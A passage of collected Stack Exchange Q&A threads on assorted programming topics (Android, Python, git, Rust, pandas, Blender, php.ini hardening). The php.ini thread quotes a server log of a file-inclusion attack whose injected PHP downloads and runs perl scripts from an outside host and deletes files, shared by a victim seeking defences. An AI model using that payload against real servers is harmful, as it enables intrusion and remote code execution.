answer though.
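Per-user "Open With" choices typically land in ~/.config/mimeapps.lst (per the freedesktop.org mime-apps spec). A sketch of removing a stray association line with standard tools, run against a sample copy rather than the real file (the .desktop entry name is made up for illustration):

```shell
# Remove a stray "open pgp files with an editor" default from a
# mimeapps.lst-style file. Works on a sample copy; the real per-user
# file would be ~/.config/mimeapps.lst.
sample="$(mktemp)"
cat > "$sample" <<'EOF'
[Default Applications]
application/pgp-encrypted=org.gnome.gedit.desktop
text/plain=org.gnome.gedit.desktop
EOF

# Drop only the pgp line; every other association stays untouched.
grep -v '^application/pgp-encrypted=' "$sample" > "$sample.new"
mv "$sample.new" "$sample"
cat "$sample"
```

The same file also has an [Added Associations] section worth checking; after editing, closing and reopening nautilus (nautilus -q) should pick up the change.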
How to set slidingpanel default state collapse and collapse panel min height? I am using the sliding panel foursquare library, and as I open the panel activity I find the panel to be expanded by default, but I want it to be collapsed by default, so please tell me how to do that. Also, as I slide down the panel or collapse it, the sliding layout gets only 40 dp in height, but I want it to be at least 100 dp. So please tell me how and where to make changes to have these two things in my app. What I have tried so far is changing these attributes on the sliding panel widget, but none of them is working for me collapseMap(); slidingUpPanelLayout.hidePane() slidingUpPanelLayout.collapsePane(); app:paralaxOffset="@dimen/paralax_offset" app:shadowHeight="0dp" app:dragView="@+id/sliding_container" app:panelHeight="40dp" Where did you set the states; inside onCreate()? Maybe you can read the wiki at the original SlidingUpPanelLayout from Umano https://github.com/umano/AndroidSlidingUpPanel @eee I have resolved my one problem regarding setting the sliding panel layout to be collapsed by default, but please tell me how to change the height of the collapsed panel The sliding panel foursquare library is actually implementing this library: https://github.com/umano/AndroidSlidingUpPanel and I have used this AndroidSlidingUpPanel library, and for this I used mSlideLayout.setPanelState(SlidingUpPanelLayout.PanelState.COLLAPSED); So I hope this code will help you. 
I have resolved this issue, thanks for your reply, but can you please help me out with my second issue, which is regarding the collapsed panel height I had used it like this: <com.sothree.slidinguppanel.SlidingUpPanelLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:sothree="http://schemas.android.com/apk/res-auto" android:background="@color/hk_white" android:gravity="bottom" sothree:umanoDragView="@+id/dragView" sothree:umanoOverlay="true" sothree:umanoPanelHeight="@dimen/Size_100" sothree:umanoParalaxOffset="100dp" sothree:umanoShadowHeight="0dp"> I did, but none of these worked for me; I have mentioned above in the question the attributes I changed Use sothree instead of app to change the panel height in XML, see my code I don't think it will make any difference, because I have entered app in the xmlns attribute in the XML You can set the default state from the layout xml file itself. Add the below attributes to the com.sothree.slidinguppanel.SlidingUpPanelLayout app:umanoInitialState="collapsed" For collapsed panel height app:umanoPanelHeight="100dp"
HTTP Error when using urllib.request I am trying to do a profanity check test. The code I have written so far is import urllib.request def read_text (): file = open (r"C:\Users\Kashif\Downloads\abc.txt") file_print = file.read () print (file_print) file.close () check_profanity (file_print) def check_profanity (file_print): connection = urllib.request.urlopen ("http://www.purgomalum.com/service/containsprofanity?text="+file_print) output = connection.read () print ("The Output is "+output) connection.close () read_text () But I get the error below urllib.error.HTTPError: HTTP Error 400: Bad Request I don't know where I am going wrong. I am using Python 3.6.1 You should include the stack trace from the error. Please also include the contents of abc. Probably there are some issues in the file itself. The HTTP error you're getting is usually a sign of something bad in the way you are requesting data from the server. According to the HTTP Spec: 400 Bad Request The request could not be understood by the server due to malformed syntax. The client SHOULD NOT repeat the request without modifications In concrete terms, in your example the problem seems to be the lack of URL encoding of the data you're sending in the URL. You should try using the method quote_plus from the urllib.parse module to make your request acceptable: from urllib.parse import quote_plus ... encoded_file_print = quote_plus(file_print) url = "http://www.purgomalum.com/service/containsprofanity?text=" + encoded_file_print connection = urllib.request.urlopen(url) If that doesn't work then the problem might be with the contents of your file. You can try it first with a simple example, to verify your script works, and then try using the file's content afterwards. Apart from the above, there are also a couple of other issues with your code: No spaces are needed between methods and brackets: file.close () or def read_text (): and so on. 
Decode the content after reading it to convert bytes to a string: output = connection.read().decode('utf-8') The way you're calling the methods creates a circular dependency. read_text calls check_profanity that in the end calls read_text that calls check_profanity, etc. Remove the extra method calls and just use return to return the output of a method: content = read_text() has_profanity = check_profanity(content) print("has profanity? %s" % has_profanity) Thanks for helping me out, it works perfectly. I just have another question. I have seen this same program working perfectly in python 2.7. Are the changes you mentioned due to the change in version? I am completely beginner therefore I don't know much Hm I don't think so. The changes I made with using quote_plus were necessary for the request to be correctly sent to the server. I don't see how this could work differently on Python 2.7. If you have that code around send it and I can try it out
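To see the encoding fix in isolation — a standalone sketch of quote_plus with no network call; the example text is made up:

```python
from urllib.parse import quote_plus

# Raw spaces/punctuation in a query string are a classic cause of
# "HTTP Error 400: Bad Request".
text = "you're a bad person!"
encoded = quote_plus(text)
print(encoded)  # you%27re+a+bad+person%21

# Safe to interpolate into the query string now:
url = "http://www.purgomalum.com/service/containsprofanity?text=" + encoded
print(url)
```

quote_plus percent-encodes everything outside the always-safe set and turns spaces into +, which is the form query strings expect.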
Little particles appearing on render When I render a preview of my animation, little twinkling particles appear. I might have turned them on, but since I'm new to Blender I don't know how to turn them off. Are you sure that cycles didn't just not finish rendering completely? Maybe there were also too few render samples set, so it didn't finish. There is related information here, for instance http://blender.stackexchange.com/questions/4980/how-to-avoid-noisy-renders-in-cycles @Jaspa I'm sure that cycles did finish rendering. In fact, this was just a preview of a render (if that changes anything?). I'm posting another screenshot of a different position of my animation and there are no little dots to see on the buildings, except on the building from the first screenshot in the distance. What are you lighting the scene with? Are you using a lamp or an HDR environment map? (My answer could be updated a little bit to suggest multiple importance if using an environment map) Possible duplicate: http://blender.stackexchange.com/q/1703/599 The "little particles" are often referred to as "fireflies". In this case, the reason they show in one scene but not the other is the light bouncing from the reflective surface, which is less even in brightness than a diffuse surface. Increasing samples can help, but it's usually not the right approach. There are a few things that can help: Set a value for Clamp Indirect to somewhere around 2 +/- 1.5 - this limits the influence indirect lighting will have on your scene. Maybe even less than 0.5 in this case. 
Try "Direct Light" (cleanest images but flat looking) or "Limited Global Illumination" Be sure "Reflective Caustics" is disabled Try lowering the number of Glossy bounces to 1 As Jaspa mentioned, you should go to the Render tab, then go to Sampling and increase the render samples to something like 1000 (the more samples, the higher the image quality), then hit Render (this option is in the Render tab)
Git bringing all commits from one repo to another At work we had a git repository, let's call it OriginalRepo, with many folders. A decision was made to provide another team with a new repository (let's call it NewRepo) with a few folders from OriginalRepo. The folder structure is the same in both repositories; the only difference is that NewRepo has a subset of the folders. The other team has made 200+ commits on a few branches. What we want is to bring all branches with all commits from NewRepo into OriginalRepo, onto the commit from which they diverged. I would like all branches which were created in NewRepo to be called "NewRepo_" + NewRepoBranchName in OriginalRepo, and all commits to keep the same authors & dates. Is it possible to create a script doing that? I guess the simplest way to do this would be to do (in OriginalRepo): git remote add NewRepo <url-to-new-repo> git fetch NewRepo Now all remote refs will be stored in .git/refs/remotes/NewRepo. In other words, you could do: git checkout NewRepo/NewRepoBranchName I think that should be enough. If you want to create local branches corresponding to each remote branch in NewRepo, you could use a for loop like this: #!/bin/bash for REMOTE_BRANCH in $(git branch -r | grep -o "[^ ]*" | grep "^NewRepo") #Loop through all remote branches from NewRepo do BRANCH=$(echo $REMOTE_BRANCH | grep -o -P "(?<=^NewRepo/).*") #Remove the NewRepo/ prefix LOCAL_BRANCH=NewRepo_$BRANCH #Add NewRepo_ prefix git branch $LOCAL_BRANCH $REMOTE_BRANCH #Create local branch corresponding to the remote branch done Alderath, many thanks for the provided solution. Actually I wanted to have branches with all commits. I have found cherry-pick is very good. git cherry-pick sha1..shaN
iOS - If passed the bottom of the screen I created a simple app that makes an image fall down. That's great, but my problem is that when it falls down it doesn't repeat. After searching I found a way to repeat it, but I want to know how to check if the image is at the bottom of the screen and then repeat the fall. Here is my code in the .h file @interface ViewController : UIViewController { NSTimer *moveit; IBOutlet UIImageView *img; } in the .m file -(void)viewDidLoad{ moveit = [NSTimer scheduledTimerWithTimeInterval:0.005 target:self selector:@selector(fallThei) userInfo:nil repeats:YES]; } -(void)fallThei{ img.center = CGPointMake(img.center.x, img.center.y +9); } and the repeat code is img.center = CGPointMake(img.center.x, -img.frame.size.height + img.frame.size.height/2); So how do I check if the image is at the bottom and then do something? Thanks in advance. You never do any checks to see if it is at the bottom of your screen. Put in some checking such as if (img.frame.origin.x == ...) -(void)fallThei { if (img.center.y >= [[[UIScreen mainScreen]bounds]size].height) { img.center = CGPointMake(img.center.x,0); } else { img.center = CGPointMake(img.center.x,img.center.y + 9); } } I tried this code and it shows me the error "No member named 'height' in 'struct CGRect'" Thank you!! That helped me, and after searching I found the way to fix that problem. Here is how I fixed that error: CGRect screenBound = [[UIScreen mainScreen] bounds]; CGSize screenSize = screenBound.size; CGFloat screenHeight = screenSize.height; if (down.center.y >= screenHeight) { down.center = CGPointMake(down.center.x,0); } else { down.center = CGPointMake(down.center.x,down.center.y + 9); } Add a test in fallThei: if(img.center.y + 9 >= screen_height + img.frame.size.height/2) { img.center = CGPointMake(img.center.x, -img.frame.size.height/2); } Thanks! But is there any way to get the screen height automatically? Yes, with [[UIScreen mainScreen]bounds].size.height
How do I plot a timeseries graph with the following data I have datehashtag_count = testing2.groupby(pd.Grouper(key='date', freq='M'))['hashtags'].value_counts() print(datehashtag_count) date hashtags 2021-01-31 ['gme' 16322 ['gme'] 13691 ['amc' 4762 ['robinhood' 1723 ['wallstreetbets' 1690 ... 2021-12-31 ['wallstreet' 1 ['wearethestockmarket' 1 ['whatdoyoubelieveln' 1 ['xela' 1 ['zom' 1 Name: hashtags, Length: 7106, dtype: int64 How do I plot a timeseries graph with the values I got, using the columns 'date' and 'hashtags' and the hashtag counts? Try something like this? import seaborn as sns import matplotlib.pyplot as plt datehashtag_count = testing2.groupby(pd.Grouper(key='date', freq='M'))['hashtags'].value_counts() print(datehashtag_count) datehastag_count = datehashtag_count.reset_index() datehashtag_count.set_axis(['date', 'hashtag' , 'count' ], axis = 1 ) plt.figure() sns.lineplot(x = 'date', y='count', hue='hastag', data=datehashtag_count) plt.show() Haven't tested the code. Don't have an equivalent dataset to work on, but this should work. Hi, thanks for the answer. I tried it and got this error: "TypeError: Cannot reset_index inplace on a Series to create a DataFrame" Yes, that's expected. Sorry, I didn't realize that value_counts returns a Series. Have edited the code. Please try the same Hi, thanks for replying. I tried it and got this error: "ValueError: cannot insert hashtags, already exists", and the error was pointing to this line of code "datehastag_count = datehashtag_count.reset_index()"
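For what it's worth, the "cannot insert hashtags, already exists" error happens because the Series returned by value_counts is itself named hashtags, the same as the new index level, so reset_index cannot create the column. Renaming the Series first avoids the clash. A minimal sketch with made-up miniature data (the real column contains stringified lists, which would need cleaning first):

```python
import pandas as pd

# Hypothetical miniature of the data: one hashtag per row.
testing2 = pd.DataFrame({
    "date": pd.to_datetime(["2021-01-05", "2021-01-20", "2021-02-10", "2021-02-11"]),
    "hashtags": ["gme", "gme", "amc", "gme"],
})

counts = (
    testing2.groupby(pd.Grouper(key="date", freq="M"))["hashtags"]
    .value_counts()
    .rename("count")      # rename the Series so reset_index doesn't clash
    .reset_index()
)
print(counts)
```

From here, sns.lineplot(x='date', y='count', hue='hashtags', data=counts) plots one line per hashtag over time.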
Configuring php.ini to prevent attacks I have been attacked on a shared host server (heartinternet) and they said I should configure my own php.ini file properly. Well I have a little php/MySQL program with a registering function, a little admin site however someone hacked it. What is the general way to configure a php.ini file to be able to prevent attack like this? Any good setting would be really appreciated. Here is what I got from the webhost provider: <IP_ADDRESS> - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "<?php echo \"j13mb0t#\"; passthru('wget http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http ://some . thesome . com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http ://some . thesome . com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>" Because script injection attacks the site code itself, it is able to completely avoid webserver security. Unfortunately, some content management systems (especially older versions of Joomla) are extremely susceptible to this form of attack. A simple way to remove the ability for attackers to use this method is to add a php.ini file at the top-level of the website with the following contents - be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change: The php.ini directives are... allow_url_include = "0" allow_url_fopen = "0" It's not clear that either of those directives would have blocked this attack. The way that attack worked was not by include()ing or fopen()ing a remote URL, it relied on being able to trick your code into include()ing /proc/self/environ which is a file containing the process's environment variables. The request poisoned those environment variables with the actual exploit code, and the actual exploit downloaded and executed a perl script that did the dirty work. 
Establishing an open_basedir setting that allows your code to only open files in specific directories would have blocked this attack, but in general, programs that execute scripts based on user input without very rigorous controls have dozens of ways to be attacked, especially if they allow user-uploaded content like pictures or whatever. Keeping your site code up-to-date is important too. Especially since this exploit has been known to affect Joomla since at least last March Thanks for your kind answer, could you give me an example of how to do that, as I am a beginner on this side. Thanks again One can also try to prevent this by using magic_quotes_gpc = On and magic_quotes_runtime = On in your php.ini. This automatically escapes all ' (single-quote), " (double quote), \ (backslash) and NULs with a backslash for GET, POST and cookies sent. I do not get it It seems php7 doesn't have this option in php.ini, or should I change it somewhere else? If you are asking how to prevent exactly this attack, what you need to disable is the passthru function in php.ini. If you are privileged to load your custom php.ini, you can disable some dangerous php functions such as exec (unless your script needs them) by putting the appropriate functions in the php disable_functions list. disable_functions=passthru,exec,phpinfo There is no specific set of functions to disable which works here (if there were, the php devs would never have included them in php :)). It all depends on the php functions you use and don't use. So, refer to the php manual, and add any system-command-invoking php functions which are not used in your site scripts to the disable_functions list. Additionally, ask your host to install & configure mod_security, which will not only protect your domain but everyone else in the shared environment. mod_security is a wonderful web application firewall which will help you protect sites from a number of web attacks including html injection, sql injection, XSS attacks, etc. 
From the given attack details, the attacker is uploading the perl script to /tmp, which is most likely a threat to the whole server and not only limited to your domain/account. Thanks a lot SparX, I really appreciate your detailed answer. Hi SparX, unfortunately I can't; my provider doesn't let me change it. Any other idea? Thanks Hi Andras, what is your host not allowing you to change? Could you clarify. Thanks for the quick reply :) mod_security is not installed, and passthru cannot be changed by Heartinternet, unfortunately. Just ask your host to disable those php functions for your domain only (either via htaccess or using a custom php.ini, depending on the current php handler). See here: http://blog.tenablesecurity.com/2009/08/configuration-auditing-phpini-to-help-prevent-web-application-attacks.html Read the entire page. point there, sorry updated. I want to configure my php.ini file as best as I can. Any help on that? See here: http://blog.tenablesecurity.com/2009/08/configuration-auditing-phpini-to-help-prevent-web-application-attacks.html Read the entire page. Again, please don't just link to outside resources. Provide some content here, perhaps a summary. See the "Provide Context..." paragraph of the How to Answer page (which you've already read, correct?).
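Pulling the suggestions in this thread together, a hedged php.ini sketch — the path and the exact function list are placeholders that have to be adapted to what the site's own scripts actually use:

```ini
; Block remote-inclusion tricks
allow_url_include = "0"
allow_url_fopen = "0"

; Confine file access to the site tree (also blocks include of /proc/self/environ)
open_basedir = "/home/example_user/public_html:/tmp"

; Disable shell-invoking functions the site never calls
disable_functions = "passthru,exec,system,shell_exec,popen,proc_open"
```

Test the site afterwards: any legitimate feature that relied on one of the disabled functions or on files outside open_basedir will break until the list is adjusted.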
Only the original thread that created a view hierarchy can touch its views. When running animation I can't figure out what is wrong here; it looks like Timer is causing this issue, but even if I remove the Timer line completely it still crashes with an error like this: "Only the original thread that created a view hierarchy can touch its views." Maybe you guys can suggest a different way to run animations inside of an activity to avoid this. Another interesting thing is that it runs perfectly fine on Android 12, but crashes on Android 7. Here is the code that sits inside the Activity: private fun setAnimations() { fadeInErrorMessage.setAnimationListener(object : Animation.AnimationListener { override fun onAnimationStart(animation: Animation) { binding.mainErrorMessageContainer.visibility = View.VISIBLE } override fun onAnimationEnd(animation: Animation) { Timer("ErrorMessage", false).schedule(1500L) { binding.mainErrorMessageContainer.startAnimation(fadeOutErrorMessage) } } override fun onAnimationRepeat(animation: Animation) {} }) fadeOutErrorMessage.setAnimationListener(object : Animation.AnimationListener { override fun onAnimationStart(animation: Animation) {} override fun onAnimationEnd(animation: Animation) { binding.mainErrorMessageContainer.visibility = View.INVISIBLE errorMessageAnimationIsRunning = false } override fun onAnimationRepeat(animation: Animation) {} }) } Here are the logs: 2022-09-14 21:24:22.981 17059-17371/com.company.app E/AndroidRuntime: FATAL EXCEPTION: ErrorMessage Process: com.company.app, PID: 17059 android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views. 
at android.view.ViewRootImpl.checkThread(ViewRootImpl.java:6892) at android.view.ViewRootImpl.invalidateChildInParent(ViewRootImpl.java:1083) at android.view.ViewGroup.invalidateChild(ViewGroup.java:5205) at android.view.View.invalidateInternal(View.java:13657) at android.view.View.invalidate(View.java:13621) at android.view.View.startAnimation(View.java:20175) at com.company.app.ui.main.MainActivity$setAnimations$1$onAnimationEnd$$inlined$schedule$1.run(Timer.kt:149) at java.util.TimerThread.mainLoop(Timer.java:555) at java.util.TimerThread.run(Timer.java:505) Just run your animations inside runOnUiThread(): runOnUiThread { binding.mainErrorMessageContainer.visibility = View.VISIBLE } runOnUiThread { binding.mainErrorMessageContainer.startAnimation(fadeOutErrorMessage) } Edit: it looks like your specific error refers to onAnimationEnd, where you're running Timer.schedule(). So you should try to make that method look like this: override fun onAnimationEnd(animation: Animation) { Timer("ErrorMessage", false).schedule(1500L) { runOnUiThread { binding.mainErrorMessageContainer.startAnimation(fadeOutErrorMessage) } } } I just put it this way and it still throws the same error, literally wrapped anything that was inside animation in runOnUiThread what's the actual line where you get that error? Also, to be clear, I don't know what you mean when you say that you "literally wrapped anything that was inside animation". You should have only wrapped specific lines that actually require the UI thread, just like I posted in my answer Well yeah that's what I meant, lines that interact with the UI, not the whole method. And it does not give me a specific line; everything that I am getting about this error in the logs I posted below the code The error line looks to be in onAnimationEnd, where you're running Timer.schedule(). 
I just want to make sure that you set up runOnUiThread() inside Timer.schedule I forgot that I had multiple Activities with a Timer that were causing this issue; I wrapped the lines inside Timer in a Runnable and it fixed the issue, thank you so much for your help! override fun onAnimationEnd(animation: Animation) { Timer("ErrorMessage", false).schedule(1500L) { binding.mainErrorMessageContainer.startAnimation(fadeOutErrorMessage) } } You can't do it on a timer like that. That causes it to happen on a different thread. Assuming you created the UI on the main thread, put the body of the timer (the binding.mainError part) inside a runOnUiThread block. If you created the UI on a different thread, you should probably fix that first. You can tell that it's the onAnimationEnd call that's causing the problem because it's the one calling startAnimation, and it's the one that's in the stack trace.
I want to use the cor() function but output says 'y' must be numeric. Problem is, it is numeric I've been reading data from an xlsx file. My read code starts off like this: ecommerce<-read.xlsx("C:\\Users\\Thomas Rhee\\Documents\\GGU\\GGU Fall 2018\\Tools for Business Analytics\\Final Project\\ecommerce.xlsx", sheet = "data", startRow = 1, colNames = TRUE, col = c(1,2,3,4,5,6,7,8)); attach(ecommerce) names(ecommerce) One of the columns is "price". It looks like this: price <chr> 329.98 324.83999999999997 324.83 350 308 310 I used sapply to find out that my 'price' column's class is character. I used the following code to convert it to numeric: ecommerce$price <- as.numeric(as.character(ecommerce$price)) I checked again and it worked. I tried typing the following and got this output: cor(rank, price) Error in cor(rank, price) : 'y' must be numeric I'm lost. I'm also a beginner at this, so I'm open to suggestions here. Please dumb it down for me. This is a good example of why you should not use attach. d <- data.frame(x = 1:3) attach(d) x ## now available because of attach # [1] 1 2 3 d$x <- LETTERS[1:3] x ## however this still refers to the original values of d$x # [1] 1 2 3 d$x # [1] "A" "B" "C" That means you changed your original data in the data frame, but in your cor(.) call you reference the original one (the one which was attached). So to solve your issue, drop the attach command and specify the columns directly (after you have transformed them to numeric): cor(ecommerce$rank, ecommerce$price) Technically, you could re-attach ecommerce again after you changed it, but because of these issues I would strongly discourage you from using attach at all.
turning list into dataframe column in R function I have a function of the (very simplified) form below. doThing <- function(df){ result <- c() #Sets up dataframe to store lists totals <- rowSums(df) #Creates rowsum list from df column result[1] <- totals #intended to make totals a column in result. does not work } How do I assign the list created in this function to a column in my result dataset? I've also tried the following use of the assign function, to no avail assign(result[1], totals) Thank you all! result <- data.frame() You could assign a row-wise sum as a new column to dataframe. doThing <- function(df){ transform(df, total= rowSums(df)) } doThing(mtcars) # mpg cyl disp hp drat wt qsec vs am gear carb total #Mazda RX4 21.0 6 160.0 110 3.90 2.62 16.5 0 1 4 4 329 #Mazda RX4 Wag 21.0 6 160.0 110 3.90 2.88 17.0 0 1 4 4 330 #Datsun 710 22.8 4 108.0 93 3.85 2.32 18.6 1 1 4 1 260 #Hornet 4 Drive 21.4 6 258.0 110 3.08 3.21 19.4 1 0 3 1 426 #Hornet Sportabout 18.7 8 360.0 175 3.15 3.44 17.0 0 0 3 2 590 #... #... We can use doThing <- function(df) { df[["total"]] <- rowSums(df) df } doThing(mtcars)
Is storing a reference to a parent possible with Rust? I have the following struct: pub struct Scope<'parent> { entries: HashMap<String, Type>, parent: Option<&'parent mut Self>, } impl<'parent> Scope<'parent> { pub fn with_parent(parent: &'parent mut Self) -> Self { Scope { entries: HashMap::new(), parent: Some(parent), } } } ////////////////////////////////////////// fn analyze_expression<'input>( errors: &mut Vec<CodeError>, wrapping_scope: &mut Scope, expression: Loc<Expression<'input>>, ) -> Result<AnnotatedExpression<'input>, AnalyzingError> { // } When trying to construct it, I get this error: error[E0623]: lifetime mismatch --> garlicsem/src/lib.rs:74:44 | 66 | wrapping_scope: &mut Scope, | ---------- | | | these two types are declared with different lifetimes... ... 74 | let scope = Scope::with_parent(wrapping_scope); | ^^^^^^^^^^^^^^ ...but data from `wrapping_scope` flows into `wrapping_scope` here Is this kind of construction possible? If not, what is the best way to implement something like this? Should I be using Rc? When I add explicit lifetimes like @nullptr suggested, I get the following error: error[E0495]: cannot infer an appropriate lifetime for borrow expression due to conflicting requirements --> garlicsem/src/lib.rs:78:56 | 78 | .map(|e| analyze_statement(errors, &mut scope, e)) | ^^^^^^^^^^ | note: first, the lifetime cannot outlive the lifetime `'_` as defined on the body at 78:26... --> garlicsem/src/lib.rs:78:26 | 78 | .map(|e| analyze_statement(errors, &mut scope, e)) | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ note: ...so that closure can access `scope` --> garlicsem/src/lib.rs:78:56 | 78 | .map(|e| analyze_statement(errors, &mut scope, e)) | ^^^^^^^^^^ note: but, the lifetime must be valid for the lifetime `'a` as defined on the function body at 64:31... 
--> garlicsem/src/lib.rs:64:31 | 64 | fn analyze_expression<'input, 'a>( | ^^ note: ...so that the expression is assignable --> garlicsem/src/lib.rs:74:44 | 74 | let scope = Scope::with_parent(wrapping_scope); | ^^^^^^^^^^^^^^ = note: expected `&mut scope::Scope<'_>` found `&mut scope::Scope<'a>` I am pretty sure that this kind of data structure just isn't possible in safe rust without using Rc or unsafe. Therefore I am wondering what the best way to implement this would be. Can you post the Scope::with_parent function and also the initialization of wrapping_scope? My guess is that wrapping_scope on line 66 needs to have an explicit lifetime 'a. @nullptr i edited my question. also, I had tried using explicit lifetimes, but since Scope takes a generic lifetime parameter, I get another lifetime error because the lifetimes don't match iirc. does my solution fix your problem? @nullptr i edited my question to show what happened when i tried adding an explicit lifetime I've edited my answer with some example code that compiles @Ian Rehwinkel It's hard to answer your question because it doesn't include a [MRE]. We can't tell what crates (and their versions), types, traits, fields, etc. are present in the code. It would make it easier for us to help you if you try to reproduce your error on the Rust Playground if possible, otherwise in a brand new Cargo project, then [edit] your question to include the additional info. There are Rust-specific MRE tips you can use to reduce your original code for posting here. Thanks! In struct Scope<'parent>, Option<&'parent mut Self> is implicitly Option<&'parent mut Scope<'parent>>. Thus, the wrapping_scope: &mut Scope parameter in analyze_expression needs to be wrapping_scope: &'a mut Scope<'a> with a 'a lifetime added in the analyze_expression<'input, 'a> function. 
To be explicit, this code compiles: use std::collections::HashMap; struct Type; pub struct Scope<'parent> { entries: HashMap<String, Type>, parent: Option<&'parent mut Self>, } impl<'parent> Scope<'parent> { pub fn with_parent(parent: &'parent mut Self) -> Self { Scope { entries: HashMap::new(), parent: Some(parent), } } } fn analyze_expression<'a>(wrapping_scope: &'a mut Scope<'a>) { let scope = Scope::with_parent(wrapping_scope); for (string, _typ) in scope.entries.iter() { println!("{:?}", string); } } This solution worked wonderfully after I changed it to be immutable (turns out i didn't need mutability).
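Since the question also asks whether Rc is the way to go: one common alternative, when borrowed parent references with `&'a mut Scope<'a>` get too restrictive, is to own the parent through Rc<RefCell<...>>, trading compile-time borrow checking for runtime checks. A hedged sketch — the String value type and the method names here are made up for illustration, not taken from the original code:

```rust
use std::cell::RefCell;
use std::collections::HashMap;
use std::rc::Rc;

// Each scope holds a shared, owning handle to its parent instead of a
// borrowed reference, so the struct needs no lifetime parameters.
struct Scope {
    entries: HashMap<String, String>,
    parent: Option<Rc<RefCell<Scope>>>,
}

impl Scope {
    fn root() -> Rc<RefCell<Scope>> {
        Rc::new(RefCell::new(Scope { entries: HashMap::new(), parent: None }))
    }

    fn child(parent: &Rc<RefCell<Scope>>) -> Rc<RefCell<Scope>> {
        Rc::new(RefCell::new(Scope {
            entries: HashMap::new(),
            parent: Some(Rc::clone(parent)),
        }))
    }

    // Walk outward through the enclosing scopes looking for a name.
    fn lookup(scope: &Rc<RefCell<Scope>>, name: &str) -> Option<String> {
        let s = scope.borrow();
        if let Some(v) = s.entries.get(name) {
            return Some(v.clone());
        }
        s.parent.as_ref().and_then(|p| Scope::lookup(p, name))
    }
}

fn main() {
    let root = Scope::root();
    root.borrow_mut().entries.insert("x".into(), "Int".into());
    let inner = Scope::child(&root);
    assert_eq!(Scope::lookup(&inner, "x").as_deref(), Some("Int"));
    println!("found x in the parent scope");
}
```

The cost is that borrow violations surface as runtime panics from RefCell rather than compile errors, and parent links must never form a cycle (here they cannot, since children only point upward).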
Image being loaded before app main method is called I have an iPad app where I am seeing an image displayed briefly before the app starts (the image is part of the bundle). My guess is that this is some wrong wiring of a xib file, but even when I set a breakpoint at the beginning of the main method, the image still appears before this point is reached. Resetting the simulator does not help, and the scenario occurs on a device too. Mmmm is the image named Default.png ? I just don't see another explanation for this problem ^^ By the way, I just don't use Interface Builder, to avoid this kind of strange problem ^^ Thanks - Yes, I just realized this, that it was the custom launch screen.
Can PySpark work with numpy arrays? I tried to execute the following commands in a pyspark session: >>> a = [1,2,3,4,5,6,7,8,9,10] >>> da = sc.parallelize(a) >>> da.reduce(lambda a, b: a + b) It worked fine. I got the expected answer (which is 55). Now I try to do the same but using numpy arrays instead of Python lists: >>> import numpy >>> a = numpy.array([1,2,3,4,5,6,7,8,9,10]) >>> da = sc.parallelize(a) >>> da.reduce(lambda a, b: a + b) As a result I get a lot of errors. To be more specific, I see the following error several times in the error message: ImportError: No module named numpy.core.multiarray Is something not installed on my cluster, or is pyspark unable to work with numpy arrays at a fundamental level? It looks like a configuration (version mismatch?) problem; otherwise it should work just fine. It says here that numpy is supported: link It gives some info under the Python tab. I had similar issues. I did the below and the issue was resolved: pip uninstall numpy pip install numpy pip install nose
Shift invariant in wavelet I always hear that the wavelet transform is not shift invariant, and that there are other types of wavelet transforms, like the stationary wavelet and double-density dual-tree wavelet transforms, that are shift invariant. Can anyone explain to me what "shift invariant" means? I'm voting to close this question as off-topic because it is about math rather than programming. dsp.stackexchange.com might be a better place for it. Shift Invariant (Time Invariant in the Time Domain) means that, given an input and its corresponding output, a shifted version of the same input will yield a correspondingly shifted output. Namely, if F is the Operator, then OutputImage(x, y) = F(InputImage(x, y)). If F is Shift Invariant, it means OutputImage(x - s1, y - s2) = F(InputImage(x - s1, y - s2)). In the Wavelet world the property of Shift Invariance is usually achieved by skipping the Decimation step.
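To make this concrete, here is a small pure-Python sketch (a hand-rolled one-level Haar detail band, not any particular wavelet library): the decimated transform used by the standard DWT produces completely different coefficients when the input is delayed by one sample, while the undecimated (stationary) transform's coefficients simply shift along with the input.

```python
import math

def haar_detail_decimated(x):
    """Standard DWT detail band: pairwise differences, then downsample by 2."""
    s = 1 / math.sqrt(2)
    return [(x[i] - x[i + 1]) * s for i in range(0, len(x), 2)]

def haar_detail_undecimated(x):
    """Stationary (undecimated) detail band: differences at every position, circular."""
    s = 1 / math.sqrt(2)
    n = len(x)
    return [(x[i] - x[(i + 1) % n]) * s for i in range(n)]

x = [0, 0, 1, 1, 0, 0, 0, 0]
x_shifted = [0] + x[:-1]          # same signal, delayed by one sample

# Decimated: the edge now lands on a different pair parity, so the
# coefficients are not a shifted copy of the originals.
print(haar_detail_decimated(x))          # all zeros
print(haar_detail_decimated(x_shifted))  # non-zero entries appear

# Undecimated: the coefficient sequence is just circularly shifted.
d = haar_detail_undecimated(x)
d_shifted = haar_detail_undecimated(x_shifted)
print(d_shifted == d[-1:] + d[:-1])      # True
```

The decimation step is what breaks the invariance: downsampling by 2 makes the output depend on whether the signal's features fall on even or odd positions, which is exactly what a one-sample shift changes.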
